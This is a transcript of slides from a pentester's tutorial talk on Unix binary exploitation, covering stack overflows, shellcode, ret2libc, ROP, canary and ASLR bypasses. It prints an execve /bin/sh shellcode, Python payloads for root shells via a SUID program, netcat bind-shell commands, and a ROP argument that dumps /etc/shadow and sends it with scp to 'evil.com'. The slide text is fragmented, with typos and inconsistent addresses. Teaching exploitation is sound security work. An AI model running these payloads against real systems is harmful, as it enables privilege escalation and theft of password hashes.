Unix executable buffer overflow

transcript

UNIX EXECUTABLE EXPLOITATION

Ammarit Thongthua

#whoami

<Name>

Ammarit Thongthua

ShellCodeNoob

</Name>

Pentest Team leader in private company

</Profile>

FB : Ammarit Es Shellcodenoob

“There are some relationships between

- Reverse Engineering

- Buffer overflow

- Shellcode They are the complement of each other”

“Sleepy Kama”

#Inspiration

Today, we will start with

AGENDA

Introduction Vulnerable Unix executable

Memory Space and Stack Layout

Buffer Overflow

Unix application Basic Reverse Engineer

ShellCode

Protection vs Expliotation Basic Stack without protection

Bypass password protection Exploit to get root privilege

Limited Stack Space

StackGuard (Canary)

Non-Executable-Stack (NX)

ROP Chain

Address Space Layout Randomization (ASLR) Defeat with static system library (kernel < 2.6.20 )

ASLR with removed Static system library Defeat with application wrapping (kernel >= 2.6.20 )

Compare with windows exploitation

Chapter I

“Vulnerable Unix Application”

VULNERABLE UNIX APPLICATION

Has permission “root” as user or group

SUID or SGID is set (Sting S at eXecute bit)

This 2 criteria provided privilege escalation to be root

list="$(find / -perm -4000 -o -perm -2000)";for i in

$list; do ls -al $i; done

ls –R / | grep “wsr” | grep “root”

VULNERABLE UNIX APPLICATION

Use vulnerable input standard function

Ex: strcp(), gets(), sprintf (), vsprintf ()

They make the program can possibly segmentation

fault or buffer overflow

Chapter II

“Memory Address and Stack Layout”

MEMORY ADDRESS AND STACK LAYOUT

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

0xFFFFFFFF

0x00000000

Code Segment

Data Segment

DSS Segment

main ()

int i = 0;

checkpw (); }

char pw[608];

0xFFFFFFFF

0x00000000

Int i = 0;

Previous Stacks

Main()

main ()

int I = 0;

checkpw (); }

char pw[608];

main ()

int I = 0;

checkpw (); }

char pw[608];

0xFFFFFFFF

0x00000000

Char pw[608];

Int i = 0;

Previous Stacks

Main()

checkpw() SFP

Chapter III

“Stack buffer overflow”

BUFFER OVERFLOW

The situation when the data that input to the

system is larger than the size of buffer that

declare to be used

AAAAAAAAAA....[607 of A]….AAA\x00 SFP RP

AAAAAAAAAA….[616 of A]….AAAAAAAAAAAAAA\x00

SFP = 0x41414141

***RP = 0x41414141

“Segmentation fault” “Illegal Instruction”

SFP RP

Ex: char pw[608];

“How can we detect

buffer overflow in unix application?”

“Generally, we use manually test”

BUFFER OVERFLOW

“Better way, we use pattern test”

BUFFER OVERFLOW

/usr/share/metasploit-framework/tools/pattern_create.rb 1000

Check buffer overflow position

BUFFER OVERFLOW

Check buffer overflow position

/usr/share/metasploit-framework/tools/pattern_offset.rb 41347541

BUFFER OVERFLOW

“What happen

if we can over write Return Pointer?”

“Can we control flow of instruction?”

“Yes”

BUFFER OVERFLOW

AAAAAAAAAAAAA….[612 of A]….AAAAAAA

SFP = 0x41414141

***RP = 0x080484c7

SFP RP

0x080484c7

BUFFER OVERFLOW

Demo #1

GDB and Bypass password

protection

Chapter IV

“Basic Shellcode”

“Imagine if we can control Return Pointer to

our own Instruction”

“So, we can control the whole system”

SHELL CODE

[Malicious Machine OpCode] + AAAAAAAAAAAAAAA

SFP = 0x41414141

***RP = 0xFBFF0544

0xFBFF0544

SFP RP

Attacker can control return pointer to run Malicious Machine OpCode that put to memory (Shell Code).

Insert shell code as a part of input to reduce the complexity of exploitation

SHELL CODE

Shell code is the code that attacker want the

system run in order to operate the command as

attacker need (create form assembly and convert

to OpCode

Open port for connection to that system with root privilege

Add user to the system

Run shell as root privilege

Shell code is written as Hexadecimal format

“What happen if we can make Return Pointer

system_call /bin/sh

by program run as root ?”

“We will get shell prompt with root pri.”

SHELL CODE

31 C0 50 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 53 89 E1 B0 0B CD 80

Assembly Code Op Code

Shell Code

: system_call (/bin/sh)

SHELL CODE

System_call(/bin/sh) Run as “root”

Vulnerability program

We get /bin/sh as root

“How can we get shellcode ?”

Where can we get shell code use to make exploit. ?

Create your own shell code (quite take time)

Use Metasploit to generate shell code

Metepreter

Search from internet

shell-storm.org/shellcode

packetstormsecurity.com

www.exploit-db.com/exploits

SHELL CODE

“How can we manually create shellcode ?”

“Good news, you need to understand

Assemble first !!”

https://defuse.ca/online-x86-assembler.htm#disassembly

SHELL CODE

“How can we know what is shellcode do ?”

“Good news again, you need to understand

Assemble first !!”

http://www2.onlinedisassembler.com/odaweb/

SHELL CODE

“Can you see something difference between

Assembly from debugger and output from

the webs?”

ASSEMBLY CODE

From our debugger From our web disassembly

What’s wrong ?

Nothing wrong..

It’s just different instruction set

ASSEMBLY CODE

From our debugger From our web disassembly

AT&T base instruction Intel base instruction

Chapter V

“Make exploit payload”

EXPLOIT PAYLOAD

[Shell Code] + [PADDING make size to 612 ]

SFP = 0x41414141

***RP = 0xBFFF528

SFP RP

Payload = Shellcode + PAD + RP

612 bytes 4 bytes

0xBFFF528

Example:

Where is the shell code start location (For this

example case)?

Need to reverse engineering and debug

EXPLOIT PAYLOAD

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x20\xf5\xff\xbf” #0xBFFF520 (Little Endean!!!) PAYLOAD = scode + “A”*528 + RP print PAYLOAD ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

EXPLOIT PAYLOAD

“Let’s try our payload”

EXPLOIT PAYLOAD

Sometime result of our exploit is crash !!!

“What’s wrong in our PAYLOAD ^^? ”

EXPLOIT PAYLOAD

Memory on address when debug and run exploit

payload may a bit shift

[Shell Code] + [PADDING make size to 612 ] 0xBFFF528

“How can we solve this problem ?”

[ Shell Code ] + [ 577 Byte of PADDING ] 0xBFFF528

EXPLOIT PAYLOAD

[400B. Landing space] +[Shell Code] + [177 B. PADDING ] 0xBFFF540

NOP (\x90) = Do nothing

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\x58\xf5\xff\xbf” # 0xBFFF558 Exp = “\x90”*400 + scode + “A”*128 + RP ----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

EXPLOIT PAYLOAD

“Let’s try our improved payload”

EXPLOIT CODE

When exploit successfully

EXPLOIT CODE

Demo #2

Exploit to get root privilege

Chapter VI

“Buffer overflow in limited stack space”

LIMITED STACK SPACE

\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\

SFP = 0x12237657

***RP = 0x4a6ef36f

SFP RP

Payload =\x31\x57\xdf\x45\x98\xce\x55\xed\x78\xed\xed\x57\x76\x23\x12\x6f\xf3\x6e\x4a\

“How can we solve this problem”

LIMITED STACK SPACE

[ NOP Space (NOP Sledding) ] + [S h e l l C o d e ]

AAAAAAAAAAAAA…[612 of A]…AAAAAAAA

SFP = 0x41414141

***RP = 0xBFFFxxxx ??? (We don’t know yet)

0xFBFFxxxx

SFP RP

If size of buffer is limited, we need to put some

shell code some where in stack and control RP to

run shell code

LIMITED STACK SPACE

***RP = 0xBFFFF7B0

Shellcode = “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80” RP = “\xb0\xf7\xff\xbf” # 0xBFFF520 Exp =`python c- ‘print “A”*612` + RP + =`python c- ‘print “\x90”*400` + scode

----------------------------------------------------------------------------------------------- user@host:$ python exp.py | ./vul_app

LIMITED STACK SPACE

Demo #3

With Limited Stack Space

LIMITED STACK SPACE

SUMMARY

Grant() main() AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA RP

\x90 \x90\x90\x90\x90\x90\x90 + [Shell Code] AAAAAAAAAAAAAAAAAAAAAAAAAAA RP AAAAA

Bypass password protection

Buffer overflow to run shellcode to get root privilege

Buffer overflow to run shellcode with limited Stack Space

“Is it easy like this in real life?”

“No..”

Chapter VII

“Ret-2-libc”

“What is Ret-2-libc ?”

Characteristic of vulnerable program

Has set SUID, GUID

Can Overflow

Use Libc.

BYPASS LIMITED STACK SPACE BY RET-2-LIBC

“What happen if we jump RP and run?”

system_call nc –l –p 9999 –e /bin/sh

Fool program to make system call with evil

command

System_call nc -l -p 9999 -e /bin/sh

AAAAAAAAAAAAA

If Arg = “nc -l -p 9999 -e /bin/sh” and Program run as “root” So, “nc –l –p 9999 –e /bin/sh” run as “root”

RP Arg system

Find location of “system” call function

Create “evil” Argument as system global variable

AAAAAAAAAAAAA

SFP RP =

Arg system

\xf0\x4e\xec\xb7 \x98\xfa\xff\xbf NC =

Result

Demo #4

with Ret-2-libc style

Chapter VIII

“ROP Chaining”

The limitation of Ret-2-Libc is run only 1 command a time to exploit

AAAAAAAAAAAAA

SFP RP =

Arg system

ROP CHAIN

“It’s better if we can run more than one

command in one exploit”

“Let improve Ret-2-Libc to ROP Chaining”

AAAAAAAAAAAAA

SFP RP =

Arg1 system

ROP CHAIN

AAAAAAAAAAAAA Arg1 system

ROP CHAIN

Arg1 system

ROP CHAIN

Arg1 system

ROP CHAIN

Arg1 system

ROP CHAIN

RP Arg2 system

ROP CHAIN

Arg1 system system Arg2 RP

ROP CHAIN

Arg1 system system Arg2 RP

ROP CHAIN

Arg1 system system Arg2 RP system Arg3 RP

ROP CHAIN

Arg1 system system Arg2 RP system Arg3 RP

ROP CHAIN

Arg1 system system Arg2 system Arg3

Argn-2 system system Argn-1 system Argn

export ARG1=“unshadow /etc/passwd /etc/shadow > /output.txt”

export ARG2=“scp haker@evil.com:output.txt /home/haker”

export ARGn=“nc –l –p 4444 –e /bin/sh”

ROP CHAIN

“How can we chain them ?”

“We need POP POP RET”

ROP Gadget

Arg1 system

ROP CHAIN

RP Arg2 system

ROP CHAIN

POP POP RET

Arg1 system RP Arg2 system

ROP CHAIN

\xc5\x85\x48\x80

Arg1 system RP Arg2 system

ROP CHAIN

Arg1 system system Arg2 system Arg3

Argn-2 system system Argn-1 system Argn

RP = \xc5\x85\x48\x80 (POP|POP|RET)

RP RP RP

ROP CHAIN

python -c 'print "A"*12 +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg1]" + "PADS" +

"\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.arg2]“ + "PADS" +

. "\x[syscall.addr.]" + "\x[P/P/R addr.]" + "\x[addr.argN]“ + "PADS" +

Chapter IIX

“Stack Guard (Canary)”

Cookie of death

STACK GUARD (CANARY)

Protection mechanism place in stack (8 byte) to detect the overflow and preventing to control RP

Need to include when we compile program

gcc -fstack-protector code.c -o myprogram

If canary overwritten the program will be terminated

Type of Canary

NULL canary (0x00000000)

Terminator canary (0x00000aff – 0x000aff0d)

Random canary (Unpredicted 4 byte)

AAAAAAAAAAAAAAAAAAAA AAAA AAAA AAAA

SFP RP Canary

For Null canary and Terminator canary can be

defeated by “Canary repaired”

NULL canary only app use gets() function

AAA…AAA00000000AAAA[RP] x90\x90\x90\x[Shellcode]\x0a

Terminator canary (always 0x00000aff)

app use gets() function

app use strcpy() function and need more than 1 arg

AAA…AAAAAAA0affAAAA[RP] x90\x90\x90\x[Shellcode]00

BBB…BBBBB00

CCC…CCC00

AAA…AAA00000affAAAA[RP] x90\x90\x90\x[Shellcode]

STACK GUARD (CANARY) DEFEAT

STACK GUARD (CANARY) DEFEAT EXAMPLE

Find opportunity to exploit

Canary value = 0x00000aff (It is a terminator canary ^_^)

Run exploit

Demo #5

with canary repaired

STACK GUARD (CANARY) DEFEAT

Chapter IX

“ASLR”

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)

Technique use prevent an attacker jumping to a

particular exploited code in memory by random

the virtual address in every runtime.

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR)

\x90\x90\x90 \x90\x90 + [Shell Code] + AAAAAAAAAAAAAAAAAAAAA RP …….

Random is 2 So, Possibility =1/2 or 0.000001 20 20

How can we increase possibility to jump to shell code ?

ADDRESS SPACE LAYOUT RANDOMIZATION (ASLR) DEFEAT METHOD

AAAAAAAAAAAAAAAAAAAAAAA RP /x90/x90/x90/x[ shell code ] …….

JMP ESP

If OS kernel has some static lib kernel < 2.6.20.

Use JMP ESP (Trampoline) instruction in that

static lib to bring RP to shell code

INC EAX ADD EBS, EBP ….

If OS kernel has not static lib (kernel >= 2.6.20 ), need to write application to call vulnerable application to limit random address space (App wrap up)

AAAAAAAAAAAAAAAAAAAAAAAAA

RP /x90/x90/x90/x90/x90/x90/x90/x90

/x90/x90/x90/x90/x90/x90/x90/x90/x90 /x90/x90/x90/x90/x[ shell code ]

Check current ESP value

and Set RP = ESP + [vul app buffer]

Wrap up app

Result

Chapter X

“Compare Windows & unix exploit”

DIFFERENCE OF UNIX AND WINDOWS APPLICATION EXPLOIT

Unix application directly communicate to kernel

Window application must communicate through

Window API (Not directly communicate to kernel) . It’s make more difficult to exploit

App Kernel

App Kernel API

WINDOW SHELLCODE

Static Shellcode (Example for window XP)

Static or fix memory address of windows API that use

in exploit code (Specific OS version and SP)

Find address of WinExec() > use to execute cmd / app

Find address of ExitProcess() > use to clear register

Portable Shellcode

Dynamically find memory address of need window

API by using 2 useful windows API

LoadLibraryA() to get Hmodule (DLL's base address )

GetProcessAddress() to get real address of function

Get address of WinExec()

Get address of ExitProcess()

Normally, virus use LoadLibraryA() and GetProcessAddress() to make portable expliot

WINDOW SHELLCODE

\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x4d\x11\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xa2\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x61\x6c\x63\x2e\x65\x78\x65

BASIC STACK BUFFER OVERFLOW ON WINDOWS APPLICATION

Found the vulnerability of application

Input to the system is larger than the size of

buffer that declare to be used

AAAABBBBCCCC.....KKKKLLLLMMMM SFP RP

char local[49];

AAAABBBBCCCC.....KKKKLLLLMMMM NNNN OOOOPPPP

Find address to jump to exploit code

\x90\x90\x90\x90…[shellcode]…AAAAAAAA RP

* RP = “\x40\xff\x13

Exploit Successful

Successfully exploit.

But calc.exe run as

your permission not “Administrator”

Imagine, if some windows application provide

network service like FTP that start by

“SYSTEM” account and have buffer overflow vulnerability (Ex: WarFTP app)

FTP 192.168.1.2

USER AAAAAA….AAAA $JMP_ESP \x90\x90\x90\x90 SYSCODE

After connect back to open port, user/password

to the system to confirm that we successfully get system privilege

Rule of permission gaining in Windows exploit

If we exploit the application, we will get the

permission as who start or run the application

If application or service start or run by

“Administrator” or “SYSTEM” account, we will gain

“Administrator” or “SYSTEM” privilege

All windows vulnerability that attacker use to

compromise OS occurred form successfully exploit

“SYSTEM” service

BASIC WINDOWS EXPLOITATION

DLL injection exploitation

SafeSeh (Structured Exception Handling) and Abuse

Windows ASLR and how to defeat

Windows DEP and how to defeat

GS protection in Windows application and how to defeat

Advance pivoting attack technique

HEAP overflow / Heap Spray / Use After free

“Unfortunately, We have not enough time to walk through”

Unix executable buffer overflow

Technology